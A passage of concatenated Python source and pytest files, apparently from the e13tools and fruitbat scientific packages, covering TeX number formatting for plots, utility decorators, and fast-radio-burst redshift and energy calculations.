other_axis = 1
else:
raise ValueError("Input argument 'pos' is invalid!")
# Set proper axes and rotation
if x is None:
x = other_axis
rotation = 0
transform = transforms.blended_transform_factory(
ax.transAxes, ax.transData)
else:
y = other_axis
rotation = 90
transform = transforms.blended_transform_factory(
ax.transData, ax.transAxes)
# Draw text
ax.text(x, y, text, rotation=rotation, ha=ha, va=va,
transform=transform, **text_kwargs)
# This function converts a float into a TeX string
def f2tex(value, *errs, sdigits=4, power=3, nobase1=True):
"""
Transform a value into a (La)TeX string for usage in a
:obj:`~matplotlib.figure.Figure` instance.
Parameters
----------
value : int or float
Value to be transformed.
Optional
--------
errs : int or float
The upper and lower :math:`1\\sigma`-errors of the given `value`.
If only a single value is given, `value` is assumed to have a centered
error interval of `errs`.
sdigits : int. Default: 4
Number of significant digits any value is returned with.
power : int. Default: 3
Minimum abs(log10(`value`)) required before all values are written in
scientific form.
This value is ignored if `sdigits` forces scientific form to (not) be
used.
nobase1 : bool. Default: True
Whether or not to include `base` in scientific form if `base=1`.
This is always *False* if `errs` contains at least one value.
Returns
-------
out : string
String containing `value` and `errs` written in (La)TeX string.
Examples
--------
>>> f2tex(20.2935826592)
'20.29'
>>> f2tex(20.2935826592, sdigits=6)
'20.2936'
>>> f2tex(20.2935826592, power=1)
'2.029\\cdot 10^{1}'
>>> f2tex(1e6, nobase1=True)
'10^{6}'
>>> f2tex(1e6, nobase1=False)
'1.000\\cdot 10^{6}'
>>> f2tex(20.2935826592, 0.1)
'20.29\\pm 0.10'
>>> f2tex(20.2935826592, 0.1, 0.2)
'20.29^{+0.10}_{-0.20}'
>>> f2tex(1e6, 12, 10)
'1.000^{+0.000}_{-0.000}\\cdot 10^{6}'
>>> f2tex(1e6, 12, 10, sdigits=6)
'1.000^{+0.000}_{-0.000}\\cdot 10^{6}'
"""
# Collect value and errs together
vals = [value, *map(abs, errs)]
# If vals contains more than 1 value, set nobase1 to False
if(len(vals) > 1):
nobase1 = False
# Calculate the maximum power required for all values
n = [int(np.floor(np.log10(abs(v)))) if v else -np.infty for v in vals]
n_max = max(n)
# Check that n_max is a valid value
if(n_max == -np.infty):
sdigits = 0
n_max = 0
# If there are no significant digits requested, never use scientific form
if not sdigits:
power = None
# Else, if n_max >= sdigits, always use scientific form
elif(n_max >= sdigits):
power = 0
# Create empty list of string representations
strings = []
# Convert all values into their proper string representations
for v, ni in zip(vals, n):
# Calculate the number of significant digits each value should have
sd = sdigits-(n_max-ni)
# If the sd is zero or -infinity
if(sd <= 0):
# Then v must always be zero
v *= 0.
sd = max(0, sdigits-n_max)
# If no power is required, create string without scientific form
if power is None or (abs(n_max) < power):
strings.append(r"{0:#.{1}g}".format(v, sd))
pow_str = ""
# Else, convert value to scientific form
else:
# If v is zero, set sd to the maximum number of significant digits
if not v:
sd = sdigits
# Calculate the base value
base = v/pow(10, n_max)
# Determine string representation
if(base == 1) and nobase1:
strings.append(r"10^{{{0}}}".format(n_max))
pow_str = ""
else:
strings.append(r"{0:#.{1}g}".format(base, sd))
pow_str = r"\cdot 10^{{{0}}}".format(n_max)
# Check contents of strings and convert accordingly
if(len(strings) == 1):
fmt = r"{0}{1}"
elif(len(strings) == 2):
fmt = r"{0}\pm {1}{2}"
else:
fmt = r"{0}^{{+{1}}}_{{-{2}}}{3}"
# Return string
return(fmt.format(*strings, pow_str))
# This function converts an astropy quantity into a TeX string
def q2tex(quantity, *errs, sdigits=4, power=3, nobase1=True, unitfrac=False):
"""
Combination of :func:`~e13tools.pyplot.f2tex` and
:func:`~e13tools.pyplot.apu2tex`.
Transform a :obj:`~astropy.units.quantity.Quantity` object into a (La)TeX
string for usage in a :obj:`~matplotlib.figure.Figure` instance.
Parameters
----------
quantity : int, float or :obj:`~astropy.units.quantity.Quantity` object
Quantity to be transformed.
Optional
--------
errs : int, float or :obj:`~astropy.units.quantity.Quantity` object
The upper and lower :math:`1\\sigma`-errors of the given `quantity`.
If only a single value is given, `quantity` is assumed to have a
centered error interval of `errs`.
The unit of `errs` must be convertible to the unit of `quantity`.
sdigits : int. Default: 4
Maximum amount of significant digits any quantity is returned with.
power : int. Default: 3
Minimum abs(log10(`value`)) required before all quantities are written
in scientific form.
This value is ignored if `sdigits` forces scientific form to (not) be
used.
nobase1 : bool. Default: True
Whether or not to include `base` in scientific form if `base=1`.
This is always *False* if `errs` contains a value.
unitfrac : bool. Default: False
Whether or not to write `unit` as a LaTeX fraction.
Returns
-------
out : string
String containing `quantity` and `errs` written in (La)TeX string.
Examples
--------
>>> import astropy.units as apu
>>> q2tex(20.2935826592)
'20.29'
>>> q2tex(20.2935826592*apu.kg, 1500*apu.g)
'20.29\\pm 1.50\\,\\mathrm{kg}'
>>> q2tex(20.2935826592*apu.solMass/apu.yr)
'20.29\\,\\mathrm{M_{\\odot}\\,yr^{-1}}'
>>> q2tex(20.2935826592*apu.solMass/apu.yr, sdigits=6)
'20.2936\\,\\mathrm{M_{\\odot}\\,yr^{-1}}'
>>> q2tex(20.2935826592*apu.solMass/apu.yr, power=1)
'2.029\\cdot 10^{1}\\,\\mathrm{M_{\\odot}\\,yr^{-1}}'
>>> q2tex(1e6*apu.solMass/apu.yr, nobase1=True)
'10^{6}\\,\\mathrm{M_{\\odot}\\,yr^{-1}}'
>>> q2tex(1e6*apu.solMass/apu.yr, nobase1=False)
'1.000\\cdot 10^{6}\\,\\mathrm{M_{\\odot}\\,yr^{-1}}'
>>> q2tex(20.2935826592*apu.solMass/apu.yr, unitfrac=False)
'20.29\\,\\mathrm{M_{\\odot}\\,yr^{-1}}'
>>> q2tex(20.2935826592*apu.solMass, 1*apu.solMass, unitfrac=True)
'20.29\\pm 1.00\\,\\mathrm{M_{\\odot}}'
"""
# Collect quantity and errs together
qnts = [quantity, *errs]
# If astropy is importable, check if there are quantities
if import_astropy:
# Make empty lists of values and units
values = []
units = []
# Loop over all quantities given and split them up into value and unit
for q in qnts:
if isinstance(q, apu.quantity.Quantity):
values.append(q.value)
units.append(q.unit)
else:
values.append(q)
units.append(apu.dimensionless_unscaled)
# Obtain the unit of the main value
unit = units[0]
# Loop over the errors
for i, u in enumerate(units[1:], 1):
# Try to convert the error quantity to have the same unit as main
try:
values[i] *= u.to(unit)
# If this fails, raise error
except apu.UnitConversionError:
raise ValueError("Input argument 'errs[{}]' (unit: {!r}; {}) "
"cannot be converted to the same unit as "
"'quantity' (unit: {!r}; {})!".format(
i-1, str(u), u.physical_type,
str(unit), unit.physical_type))
# Value handling
string = f2tex(*values, sdigits=sdigits, power=power, nobase1=nobase1)
# Unit handling
if(unit.physical_type != 'dimensionless'):
unit_string = apu2tex(unit, unitfrac=unitfrac)
string = ''.join([string, r'\,', unit_string])
# Return string
return(string)
# Else, handle given arguments as normal values
else: # pragma: no cover
return(f2tex(*qnts, sdigits=sdigits, power=power, nobase1=nobase1))
```
#### File: e13tools/tests/test_core.py
```python
import sys
# e13Tools imports
import e13tools.core as e13c
# %% PYTEST FUNCTIONS
def test_InputError():
assert Exception in e13c.InputError.mro()
try:
raise e13c.InputError
except Exception:
assert sys.exc_info()[0] == e13c.InputError
def test_ShapeError():
assert Exception in e13c.ShapeError.mro()
try:
raise e13c.ShapeError
except Exception:
assert sys.exc_info()[0] == e13c.ShapeError
def test_compare_version():
assert e13c.compare_versions('0.1.1', '0.1.0')
assert not e13c.compare_versions('0.1.0a0', '0.1.0')
assert not e13c.compare_versions('0.0.9', '0.1.0')
assert e13c.compare_versions('1.0.0', '0.1.0')
assert not e13c.compare_versions(None, '0.1.0')
```
#### File: e13tools/tests/test_utils.py
```python
import logging
from inspect import currentframe
# Package imports
import numpy as np
import pytest
# e13Tools imports
from e13tools.core import InputError
from e13tools.utils import (
add_to_all, docstring_append, docstring_copy, docstring_substitute,
check_instance, delist, get_main_desc, get_outer_frame, raise_error,
raise_warning, split_seq, unpack_str_seq)
# %% CUSTOM CLASSES
# Define test class for get_outer_frame function testing
class _Test(object):
def __init__(self):
self._test()
def _test(self):
_test2(self)
def _test2(instance):
get_outer_frame(instance.__init__)
# Create function to be added to module's __all__
@add_to_all
def add_to_all_test():
pass
# Define custom class for check_instance test
class CustomClass(object):
def __init__(self):
self._prop = True
@property
def prop(self):
return(self._prop)
# Custom class that inherits incorrectly from CustomClass
class CustomSubClass(CustomClass):
def __init__(self, *args, **kwargs):
pass
# %% PYTEST CLASSES AND FUNCTIONS
# Pytest for the add_to_all decorator
class Test_add_to_all(object):
# Test if function was added successfully
def test_function_add(self):
assert globals().get('__all__') == ['add_to_all_test']
# Test if trying to add an object raises an error
def test_add_no_name(self):
obj = []
with pytest.raises(AttributeError):
add_to_all(obj)
# Pytest for the custom function decorators
class TestDecorators(object):
# Create method with no docstring that is appended
@docstring_append("appended")
def append_method1(self):
pass
# Create method with a docstring that is appended
@docstring_append("appended")
def append_method2(self):
"""original """
# Create method with a docstring that is appended from another
@docstring_append(append_method1)
def append_method3(self):
"""original """
# Create old-style class with no docstring that is appended
@docstring_append("appended")
class append_old_class1:
pass
# Create old-style class with a docstring that is appended
@docstring_append("appended")
class append_old_class2:
"""original """
# Create new-style class with no docstring that is appended
@docstring_append("appended")
class append_new_class1(object):
pass
# Create new-style class with a docstring that is appended
@docstring_append("appended")
class append_new_class2(object):
"""original """
# Check if docstring_append works correctly
def test_docstring_append(self):
assert self.append_method1.__doc__ == "appended"
assert self.append_method2.__doc__ == "original appended"
assert self.append_method3.__doc__ == "original appended"
assert self.append_old_class1.__doc__ == "appended"
assert self.append_old_class2.__doc__ == "original appended"
assert self.append_new_class1.__doc__ == "appended"
assert self.append_new_class2.__doc__ == "original appended"
assert self.append_new_class1.__name__ == 'append_new_class1'
assert self.append_new_class1.__module__ != 'e13tools.utils'
assert self.append_new_class2.__name__ == 'append_new_class2'
assert self.append_new_class2.__module__ != 'e13tools.utils'
# Create method with no docstring at all
def empty_method(self):
pass
# Create new-style class with no docstring at all
class empty_class(object):
pass
# Create method that copies an empty docstring
@docstring_copy(empty_method)
def copy_method1(self):
pass
# Create method that copies a docstring
@docstring_copy(append_method2)
def copy_method2(self):
pass
# Create old-style class that copies an empty docstring
@docstring_copy(empty_class)
class copy_old_class1:
pass
# Create old-style class that copies a docstring
@docstring_copy(append_old_class2)
class copy_old_class2:
pass
# Create new-style class that copies an empty docstring
@docstring_copy(empty_class)
class copy_new_class1(object):
pass
# Create new-style class that copies a docstring
@docstring_copy(append_new_class2)
class copy_new_class2(object):
pass
# Check if docstring_copy works correctly
def test_docstring_copy(self):
assert self.copy_method1.__doc__ is None
assert self.copy_method1.__doc__ == self.empty_method.__doc__
assert self.copy_method2.__doc__ == self.append_method2.__doc__
assert self.copy_old_class1.__doc__ is None
assert self.copy_old_class1.__doc__ == self.empty_class.__doc__
assert self.copy_old_class2.__doc__ == self.append_old_class2.__doc__
assert self.copy_new_class1.__doc__ is None
assert self.copy_new_class1.__doc__ == self.empty_class.__doc__
assert self.copy_new_class2.__doc__ == self.append_new_class2.__doc__
assert self.copy_new_class1.__name__ == 'copy_new_class1'
assert self.copy_new_class1.__module__ != 'e13tools.utils'
assert self.copy_new_class2.__name__ == 'copy_new_class2'
assert self.copy_new_class2.__module__ != 'e13tools.utils'
# Check if providing both args and kwargs raises an error, method
with pytest.raises(InputError):
@docstring_substitute("positional", x="keyword")
def substitute_method1(self):
pass
# Check if providing both args and kwargs raises an error, old-style class
with pytest.raises(InputError):
@docstring_substitute("positional", x="keyword")
class substitute_old_class1:
pass
# Check if providing both args and kwargs raises an error, new-style class
with pytest.raises(InputError):
@docstring_substitute("positional", x="keyword")
class substitute_new_class1(object):
pass
# Create method using args substitutes with %
@docstring_substitute("positional")
def substitute_method2(self):
"""%s"""
# Create method using kwargs substitutes with %
@docstring_substitute(x="keyword")
def substitute_method3(self):
"""%(x)s"""
# Create method using args substitutes with .format
@docstring_substitute("positional")
def substitute_method4(self):
"""{}"""
# Create method using kwargs substitutes with .format
@docstring_substitute(x="keyword")
def substitute_method5(self):
"""{x}"""
# Create old-style class using args substitutes with %
@docstring_substitute("positional")
class substitute_old_class2:
"""%s"""
# Create old-style class using kwargs substitutes with %
@docstring_substitute(x="keyword")
class substitute_old_class3:
"""%(x)s"""
# Create old-style class using args substitutes with .format
@docstring_substitute("positional")
class substitute_old_class4:
"""{}"""
# Create old-style class using kwargs substitutes with .format
@docstring_substitute(x="keyword")
class substitute_old_class5:
"""{x}"""
# Create new-style class using args substitutes with %
@docstring_substitute("positional")
class substitute_new_class2(object):
"""%s"""
# Create new-style class using kwargs substitutes with %
@docstring_substitute(x="keyword")
class substitute_new_class3(object):
"""%(x)s"""
# Create new-style class using args substitutes with .format
@docstring_substitute("positional")
class substitute_new_class4(object):
"""{}"""
# Create new-style class using kwargs substitutes with .format
@docstring_substitute(x="keyword")
class substitute_new_class5(object):
"""{x}"""
# Check if providing args to a method with no docstring raises an error
with pytest.raises(InputError):
@docstring_substitute("positional")
def substitute_method6(self):
pass
# Check providing args to an old_style class with no docstring
with pytest.raises(InputError):
@docstring_substitute("positional")
class substitute_old_class6:
pass
# Check providing args to a new_style class with no docstring
with pytest.raises(InputError):
@docstring_substitute("positional")
class substitute_new_class6(object):
pass
# Check if combining % and .format can be done properly, method
@docstring_substitute(x="keyword")
@docstring_substitute("positional")
def substitute_method7(self):
"""%s {x}"""
# Check if combining % and .format can be done properly, old-style class
@docstring_substitute(x="keyword")
@docstring_substitute("positional")
class substitute_old_class7:
"""%s {x}"""
# Check if combining % and .format can be done properly, new-style class
@docstring_substitute(x="keyword")
@docstring_substitute("positional")
class substitute_new_class7(object):
"""%s {x}"""
# Check if docstring_substitute works correctly
def test_docstring_substitute(self):
assert self.substitute_method2.__doc__ == "positional"
assert self.substitute_method3.__doc__ == "keyword"
assert self.substitute_method4.__doc__ == "positional"
assert self.substitute_method5.__doc__ == "keyword"
assert self.substitute_method7.__doc__ == "positional keyword"
assert self.substitute_old_class2.__doc__ == "positional"
assert self.substitute_old_class3.__doc__ == "keyword"
assert self.substitute_old_class4.__doc__ == "positional"
assert self.substitute_old_class5.__doc__ == "keyword"
assert self.substitute_old_class7.__doc__ == "positional keyword"
assert self.substitute_new_class2.__doc__ == "positional"
assert self.substitute_new_class3.__doc__ == "keyword"
assert self.substitute_new_class4.__doc__ == "positional"
assert self.substitute_new_class5.__doc__ == "keyword"
assert self.substitute_new_class7.__doc__ == "positional keyword"
assert self.substitute_new_class2.__name__ == 'substitute_new_class2'
assert self.substitute_new_class2.__module__ != 'e13tools.utils'
assert self.substitute_new_class3.__name__ == 'substitute_new_class3'
assert self.substitute_new_class3.__module__ != 'e13tools.utils'
assert self.substitute_new_class4.__name__ == 'substitute_new_class4'
assert self.substitute_new_class4.__module__ != 'e13tools.utils'
assert self.substitute_new_class5.__name__ == 'substitute_new_class5'
assert self.substitute_new_class5.__module__ != 'e13tools.utils'
# Pytest for the check_instance function
def test_check_instance():
# Check if providing a non-class raises an error
with pytest.raises(InputError):
check_instance(np.array(1), np.array)
# Check if providing an incorrect instance raises an error
with pytest.raises(TypeError):
check_instance(list(), np.ndarray)
# Check if providing a proper instance of a class returns True
assert check_instance(np.array(1), np.ndarray)
# Check if providing an improper instance of a class returns False
assert not check_instance(CustomSubClass(), CustomClass)
# Pytest for the delist function
def test_delist():
# Check if providing not a list raises an error
with pytest.raises(TypeError):
delist(np.array([1]))
# Check if provided list is delisted correctly
assert delist([[], (), [np.array(1)], [7], 8]) == [[np.array(1)], [7], 8]
# Pytest for the get_main_desc function
class Test_get_main_desc(object):
# Test if a function with a single paragraph is handled correctly
def test_single_paragraph(self):
# Create dummy function
def func():
"Test"
pass
# Check if the proper string is returned for func
assert (get_main_desc(func) == 'Test')
# Test if a function with multiple paragraphs is handled correctly
def test_multiple_paragraphs(self):
# Create dummy function
def func():
"""
Test.
More test.
1313e was right here, I swear!
"""
pass
# Check if the proper string is returned for func
assert (get_main_desc(func) == 'Test.')
# Test if a function with no docstring is handled properly
def test_no_docstring(self):
# Create dummy function
def func():
pass
# Check if None is returned for func
assert get_main_desc(func) is None
# Pytest for the get_outer_frame function
def test_get_outer_frame():
# Check if providing a wrong argument raises an error
with pytest.raises(InputError):
get_outer_frame('test')
# Check if providing a non-valid frame function returns None
assert get_outer_frame(get_outer_frame) is None
# Check if providing a valid function returns that frame
caller_frame = currentframe()
assert get_outer_frame(test_get_outer_frame) is caller_frame
# Check if providing a valid method returns the correct method
_Test()
# Pytest for the raise_error function
def test_raise_error():
# Create a logger and check if an error can be properly raised and logged
logger = logging.getLogger('TEST')
with pytest.raises(ValueError, match='ERROR'):
raise_error('ERROR', ValueError, logger)
try:
raise ValueError('Error')
except Exception as error:
with pytest.raises(ValueError, match='Test Error'):
raise_error('Test '+str(error), type(error), logger,
error.__traceback__)
# Pytest for the raise_warning function
def test_raise_warning():
# Create a logger and check if a warning can be properly raised and logged
logger = logging.getLogger('TEST')
with pytest.warns(UserWarning):
raise_warning('WARNING', UserWarning, logger)
# Pytest for the split_seq function
def test_split_seq():
# Check if the following inputs all yield the same answer
assert (split_seq('A', 1, 20.0, 'B') ==
split_seq(['A', 1, 2e1, 'B']) ==
split_seq("A 1 20. B") ==
split_seq([("A", 1), (["20."], "B")]) ==
split_seq("[(A / }| ; <1{}) , ,>20.0000 !! < )?% \\B") ==
['A', 1, 20.0, 'B'])
# Check if a complicated string sequence is converted correctly
assert (split_seq('[[]1e1,\n8.,A<{7)\\\\"True') ==
[10., 8.0, 'A', 7, '\\', True])
assert split_seq('A', 1, 20.0, 'B') == ['A', 1, 20.0, 'B']
# Pytest for the unpack_str_seq function
def test_unpack_str_seq():
# Check that the following inputs all yield the same answer
assert (unpack_str_seq('A', 1, 20.0, 'B') ==
unpack_str_seq(['A', 1, 2e1, 'B']) ==
unpack_str_seq("A, 1, 20.0, B") ==
unpack_str_seq([("A", 1), (["20.0"], "B")]) ==
'A, 1, 20.0, B')
# Check that providing a non-string separator raises an error
with pytest.raises(TypeError):
unpack_str_seq([], sep=1)
``` |
{
"source": "1313e/fruitbat",
"score": 2
} |
#### File: fruitbat/tests/test_fruitbat.py
```python
import os
import numpy as np
from glob import glob
import pytest
import pytest_mpl
from astropy.coordinates import SkyCoord
from astropy import units as u
import pyymw16 as ymw16
from fruitbat import Frb, utils, cosmologies, methods, table, plot, catalogue
class TestFrbClass:
# Create FRB objects for testing
frb = Frb(dm=1000, dm_excess=1000, name='simple_frb')
frb_raj_decj = Frb(dm=1000, raj="11:05:50.0", decj="-8:34:12.0")
frb_gl_gb = Frb(dm=1000, gl="30.5", gb="-60.2")
frb_w_s = Frb(dm=1000, width=30.0, peak_flux=20.0)
frb_host_known = Frb(dm=1000, dm_excess=900, z_host=1.0, dm_host_loc=200)
frb_dm_host_0 = Frb(dm=1000, dm_excess=900, z_host=1.0)
frb_dm_host_est = Frb(dm=1100, dm_host_est=100)
frb_energy = Frb(dm=1000, obs_bandwidth=400, width=1, peak_flux=2)
frb_energy_freq = Frb(dm=1000, obs_freq_central=0.4, width=1, peak_flux=2)
frb_utc = Frb(dm=1000, utc="1999-01-01T00:00:00.000")
frb_with_units = Frb(dm=1000, obs_bandwidth=400*u.MHz)
frb_fluence = Frb(dm=1000, fluence=2)
# Test that methods returns the correct value for DM=1000 and planck2018
def test_methods(self):
methods = {
"Ioka2003": 0.80856155,
"Inoue2004": 0.98344417,
"Zhang2018": 1.10879646
}
for method in methods.keys():
z = self.frb.calc_redshift(method=method, cosmology="Planck18")
assert np.isclose(z.value, methods[method]), "Fail: {}".format(method)
# Test that a ValueError is raised when an invalid method is given.
def test_invalid_method(self):
invalid_method = "jacqui1992"
with pytest.raises(ValueError):
self.frb.calc_redshift(method=invalid_method, cosmology="Planck18")
# Test that a ValueError is raised when an invalid cosmology is given.
def test_invalid_cosmology(self):
invalid_cosmology = "cosmos_1964"
with pytest.raises(ValueError):
self.frb.calc_redshift(cosmology=invalid_cosmology)
# Test raises error on dispersion measure less than zero
def test_frb_negative_dm(self):
with pytest.raises(ValueError):
Frb(dm=-1000)
# Test that the skycoords are calculated correctly when given raj and decj
def test_frb_calc_skycoords_raj_decj(self):
ra_str = "11:05:50.0"
dec_str = "-8:34:12.0"
skycoords = self.frb_raj_decj.calc_skycoords()
test_skycoords = SkyCoord(ra_str, dec_str, frame="icrs",
unit=(u.hourangle, u.deg))
ra, dec = skycoords.ra.value, skycoords.dec.value
test_ra, test_dec = test_skycoords.ra.value, test_skycoords.dec.value
assert np.isclose((ra, dec), (test_ra, test_dec)).all()
# Test that the skycoords are calculated correctly when given gl and gb
def test_frb_calc_skycoords_gl_gb(self):
gl_str = "30.5"
gb_str = "-60.2"
skycoords = self.frb_gl_gb.calc_skycoords()
test_skycoords = SkyCoord(gl_str, gb_str, frame="galactic", unit=u.deg)
gl, gb = skycoords.galactic.l.value, skycoords.galactic.b.value
test_gl, test_gb = test_skycoords.l.value, test_skycoords.b.value
assert np.isclose((gl, gb), (test_gl, test_gb)).all()
# Test that calc_skycoords raises an error if no coords are given
def test_frb_calc_skycoords_no_coords(self):
with pytest.raises(ValueError):
self.frb.calc_skycoords()
# Test fluence is calculated correctly when given width and peak_flux.
def test_frb_calc_fluence(self):
fluence = self.frb_w_s.calc_fluence()
assert np.isclose(fluence.value, 600.0)
# Test calc_fluence raises a ValueError if width and peak_flux are None.
def test_frb_calc_fluence_raise_error(self):
with pytest.raises(ValueError):
self.frb.calc_fluence()
# Test calc_dm_igm calculates the dm_igm correctly for a known host.
def test_frb_calc_dm_igm(self):
dm_igm = self.frb_host_known.calc_dm_igm()
assert np.isclose(dm_igm.value, 800.0)
# Test calc_dm_igm raises ValueError when z is None.
def test_frb_calc_dm_igm_z_none(self):
with pytest.raises(ValueError):
self.frb_w_s.calc_dm_igm()
# Test calc_dm_igm raises ValueError when dm_host is 0.0 and z is not None.
def test_frb_calc_dm_igm_dm_host_zero(self):
with pytest.raises(ValueError):
self.frb_dm_host_0.calc_dm_igm()
# Test calc_redshift with subract_host
def test_frb_calc_redshift_subtract_host(self):
dm_1 = self.frb_dm_host_est.calc_redshift(subtract_host=True)
dm_2 = self.frb.calc_redshift()
assert np.isclose(dm_1, dm_2)
# Test that calc_redshift will raise error if subtract_host is not a bool
def test_frb_subtract_host_not_bool(self):
with pytest.raises(ValueError):
self.frb_dm_host_est.calc_redshift(subtract_host="yes")
# Test calc_dm_galaxy calculates dm_galaxy correctly for given coordinates.
def test_frb_calc_dm_galaxy(self):
dm_galaxy = self.frb_raj_decj.calc_dm_galaxy()
dm_pymw16, t_sc_pymw16 = ymw16.dist_to_dm(
self.frb_raj_decj.skycoords.galactic.l,
self.frb_raj_decj.skycoords.galactic.b, 25000)
assert np.isclose(dm_galaxy.value, dm_pymw16.value)
# Test calc_dm_galaxy raises a ValueError when no coordinates are given
def test_frb_cal_dm_galaxy_no_coords(self):
with pytest.raises(ValueError):
self.frb.calc_dm_galaxy(model="ymw16")
def test_frb_calc_lum_dist_without_z(self):
with pytest.raises(ValueError):
self.frb.z = None
self.frb.calc_luminosity_distance()
# Test calc_energy calculates the energy of an FRB
def test_frb_calc_energy_bandwidth(self):
self.frb_energy.calc_redshift()
energy = self.frb_energy.calc_energy(use_bandwidth=True)
assert np.isclose(energy.value, 2.13256754066293e+40)
def test_frb_calc_energy_frequency(self):
self.frb_energy_freq.calc_redshift()
energy = self.frb_energy_freq.calc_energy()
assert np.isclose(energy.value, 2.13256754066293e+37)
def test_frb_calc_energy_no_fluence(self):
with pytest.raises(ValueError):
self.frb.calc_redshift()
self.frb.calc_energy(use_bandwidth=True)
def test_frb_calc_energy_no_bandwidth(self):
with pytest.raises(ValueError):
self.frb_fluence.calc_redshift()
self.frb_fluence.calc_energy(use_bandwidth=True)
def test_frb_calc_energy_no_frequency(self):
with pytest.raises(ValueError):
self.frb_energy.calc_redshift()
self.frb_energy.calc_energy()
def test_frb_calc_luminosity_bandwidth(self):
self.frb_energy.calc_redshift()
lum = self.frb_energy.calc_luminosity(use_bandwidth=True)
assert np.isclose(lum.value, 4.229828665e+43)
def test_frb_calc_luminosity_frequency(self):
self.frb_energy_freq.calc_redshift()
lum = self.frb_energy_freq.calc_luminosity()
assert np.isclose(lum.value, 4.2298286655e+40)
def test_frb_calc_luminosity_no_frequency(self):
with pytest.raises(ValueError):
self.frb_energy.calc_redshift()
self.frb_energy.calc_luminosity()
def test_frb_calc_comoving_distance(self):
self.frb.calc_redshift()
dist = self.frb.calc_comoving_distance()
assert np.isclose(dist.value, 3351.51321266)
def test_frb_pass_wrong_units(self):
with pytest.raises(ValueError):
Frb(dm=1000, obs_bandwidth=400*u.m)
# Test that the FRB __repr__ is printed
def test_frb__repr__(self):
print(self.frb)
# Test all methods and properties get values and print
def test_frb_attrs(self):
for d in dir(self.frb):
attr = getattr(self.frb, d)
print(attr)
def test_create_cosmology():
# Test FlatLambdaCDM
FlatLambdaCDM_params = {'H0': 67, 'Om0': 0.3, 'flat': True}
cosmologies.create_cosmology(FlatLambdaCDM_params)
# Test FlatwCDM
FlatwCDM_params = {'H0': 67, 'Om0': 0.3, 'flat': True, 'w0': 0.9}
cosmologies.create_cosmology(FlatwCDM_params)
# Test LambdaCDM
LambdaCDM_params = {'H0': 67, 'Om0': 0.3, 'Ode0': 0.8, 'flat': False}
cosmologies.create_cosmology(LambdaCDM_params)
# Test wCDM
wCDM_params = {'H0': 67, 'Om0': 0.3, 'Ode0': 0.8, 'flat': False, 'w0': 0.9}
cosmologies.create_cosmology(wCDM_params)
class Test_fz_integrand:
# Create default cosmology
cosmo = cosmologies.create_cosmology()
cosmo_w0 = cosmologies.create_cosmology({'w0': 1})
# Test _fz_integrand correctly computes for z = 0
def test_fz_integrand_z0(self):
fz = methods._f_integrand(0, self.cosmo)
assert np.isclose(fz, 1.0)
# Test _fz_integrand correctly computes for z = 2
def test_fz_integrand_z2(self):
fz = methods._f_integrand(2, self.cosmo)
assert np.isclose(fz, 1.011299)
def test_fz_integrand_w1_z1(self):
fz = methods._f_integrand(1, self.cosmo_w0)
assert np.isclose(fz, 0.291111)
# Test _check_keys_in_dict raises a KeyError when dict is missing keys
def test_check_keys_in_dict_missing():
required_keys = ["key1", "key2"]
dictionary = {"key1": 1, "otherkey": 2}
with pytest.raises(KeyError):
utils.check_keys_in_dict(dictionary, required_keys)
def test_check_keys_in_dict_all():
required_keys = ["key1", "key2"]
dictionary = {"key1": 1, "key2": 2}
result = utils.check_keys_in_dict(dictionary, required_keys)
assert result
class TestAddingMethods:
def new_method(self, z, cosmo):
return 1200 * z
def test_add_method(self):
methods.add_method("new_method", self.new_method)
assert "new_method" in methods.available_methods()
def test_reset_methods(self):
methods.reset_methods()
assert "new_method" not in methods.available_methods()
class TestCatalogue:
def test_create_analysis_catalogue(self):
catalogue.create_analysis_catalogue("pytest_output_analysis_catalogue")
assert os.path.exists("pytest_output_analysis_catalogue.csv")
def test_create_method_catalogue(self):
catalogue.create_methods_catalogue("pytest_output_methods_catalogue")
assert os.path.exists("pytest_output_methods_catalogue.csv")
class TestCreateTables:
def test_create_tables_normal(self):
method_list = methods.builtin_method_functions()
cosmology_list = cosmologies.builtin_cosmology_functions()
# Create a lookup table for each method and cosmology
for method in method_list:
for key in cosmology_list:
here = os.getcwd()
cosmo = cosmologies.builtin_cosmology_functions()[key]
filename = "_".join(["pytest_output", method, key])
table.create(method=method, filename=filename,
cosmo=cosmo, output_dir=here, zmin=0,
zmax=20, num_samples=10000)
# Compare new tables to existing tables for 4 dm values
pre_calc_fn = ".".join(["_".join([method, key]), "npz"])
new_calc_fn = "".join([filename, ".npz"])
pre_calc = table.load(pre_calc_fn)
new_calc = table.load(new_calc_fn, data_dir=here)
test_dm_list = [0, 100, 1000, 2000]
for dm in test_dm_list:
new_z = table.get_z_from_table(dm, new_calc)
pre_z = table.get_z_from_table(dm, pre_calc)
assert new_z == pre_z
def test_create_table_zhang_figm_free_elec(self):
cosmo = cosmologies.builtin_cosmology_functions()["Planck18"]
filename = "_".join(["pytest_output", "Zhang2018",
"Planck18", "figm_free_elec"])
here = os.getcwd()
table.create(method="Zhang2018", filename=filename, cosmo=cosmo,
output_dir=here, f_igm=0.5, free_elec=0.4)
def test_create_table_zhang_figm_error(self):
cosmo = cosmologies.builtin_cosmology_functions()["Planck18"]
with pytest.raises(ValueError):
table.create(method="Zhang2018", cosmo=cosmo, f_igm=-1)
def test_create_table_zhang_free_elec_error(self):
cosmo = cosmologies.builtin_cosmology_functions()["Planck18"]
filename = "_".join(["pytest_output", "Zhang2018",
"Planck18", "free_elec_error"])
with pytest.raises(ValueError):
table.create(method="Zhang2018", filename=filename, cosmo=cosmo,
free_elec=-1)
def test_create_table_invalid_method(self):
with pytest.raises(ValueError):
table.create(method="Webb1995")
class TestPlots:
# Test that the method plot creates an output file
def test_method_plot(self):
with pytest_mpl.plugin.switch_backend('Agg'):
plot.method_comparison(filename="pytest_output_method")
cwd = os.getcwd()
if not os.path.exists(os.path.join(cwd, "pytest_output_method.png")):
raise OSError
# Test that the cosmology plot creates and output file
def test_cosmology_plot(self):
with pytest_mpl.plugin.switch_backend('Agg'):
plot.cosmology_comparison(filename="pytest_output_cosmo")
cwd = os.getcwd()
if not os.path.exists(os.path.join(cwd, "pytest_output_cosmo.png")):
raise OSError
def test_cleanup():
# Remove the files at end of test
test_files = glob("*pytest_output*")
for file in test_files:
os.remove(file)
```
#### File: fruitbat/fruitbat/utils.py
```python
from __future__ import print_function, absolute_import, division
__all__ = ["check_keys_in_dict"]
def check_keys_in_dict(dictionary, keys):
"""
Checks that a list of keys exist in a dictionary.
Parameters
----------
dictionary: dict
The input dictionary.
keys: list of strings
The keys that the dictionary must contain.
Returns
-------
bool:
Returns *True* is all required keys exist in the dictionary.
Otherwise a KeyError is raised.
"""
